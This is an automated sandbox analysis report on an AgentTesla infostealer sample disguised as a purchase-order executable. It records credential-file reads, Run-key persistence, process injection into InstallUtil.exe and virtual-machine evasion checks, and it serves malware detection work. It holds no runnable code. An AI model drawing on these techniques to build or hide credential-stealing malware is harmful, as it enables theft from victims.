                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Binary or memory string: OriginalFilenameLezykyyxwi.exe6 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe File created: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe ReversingLabs: Detection: 63%
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Virustotal: Detection: 27%
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe File read: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: unknown Process created: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe "C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe"
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe "C:\Users\user\AppData\Roaming\Avycqjqvmh.exe"
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic file information: File size 2945024 > 1048576
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2ce600
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: Yara matchFile source: 5.2.Avycqjqvmh.exe.3f9ba40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5a60000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.428ba40.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.413c600.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1966327299.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1748074888.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D4A123 push esp; iretd 0_2_00D4A126
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059709D3 push E40577B0h; iretd 0_2_059709ED
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_0597091C pushfd ; iretd 0_2_0597091D
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05972EA7 push esp; retf 0_2_05972EA8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05970854 push esp; iretd 0_2_05970855
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B5B908 push eax; retf 0_2_05B5B911
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B53229 push ds; iretd 0_2_05B5322C
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05BB367A push ebp; retf 0_2_05BB3681
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05E30E87 push E8000001h; retf 0_2_05E30E91
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012BA123 push esp; iretd 2_2_012BA126
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06190854 push esp; iretd 2_2_06190855
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0619091C pushfd ; iretd 2_2_0619091D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06190D13 push eax; iretd 2_2_06190D1D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06207E93 push es; iretd 2_2_06207ED0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06363200 push es; ret 2_2_0636323C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06373229 push ds; iretd 2_2_0637322C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063761B9 push es; ret 2_2_063761DC
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06378F1F push es; ret 2_2_06378F24
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0637B908 push eax; retf 2_2_0637B911
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063D367A push ebp; retf 2_2_063D3681
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0658302D push es; retf 2_2_06583038
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06650E87 push E8000001h; retf 2_2_06650E91
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0117A123 push esp; iretd 5_2_0117A126
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F40733 pushfd ; iretd 5_2_05F4091D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F40738 pushfd ; iretd 5_2_05F4091D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F42EA7 push esp; retf 5_2_05F42EA8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06123229 push ds; iretd 5_2_0612322C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06128F1F push es; ret 5_2_06128F24
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0612B908 push eax; retf 5_2_0612B911
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0618367A push ebp; retf 5_2_06183681
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06180007 push es; ret 5_2_0618001C
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeFile created: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeJump to dropped file
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AvycqjqvmhJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Memory allocated: D40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Memory allocated: 2750000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Memory allocated: D60000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1560000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 32D0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 31D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Memory allocated: 1270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Memory allocated: 2E80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Memory allocated: 4E80000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: A90000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2430000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2230000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Memory allocated: 1170000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Memory allocated: 2B90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Memory allocated: 29B0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 12D0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3050000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1440000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: Avycqjqvmh.exe, 00000005.00000002.1933803707.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                      Source: Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000008.00000002.2948929399.00000000013E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUSV
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1729456286.0000000000863000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1863935093.0000000005C95000.00000004.00000020.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1853373484.0000000001311000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1951096266.000000000593F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1A0000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10A8008
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1A0000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1A2000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1DC000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1DE000
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 25F008
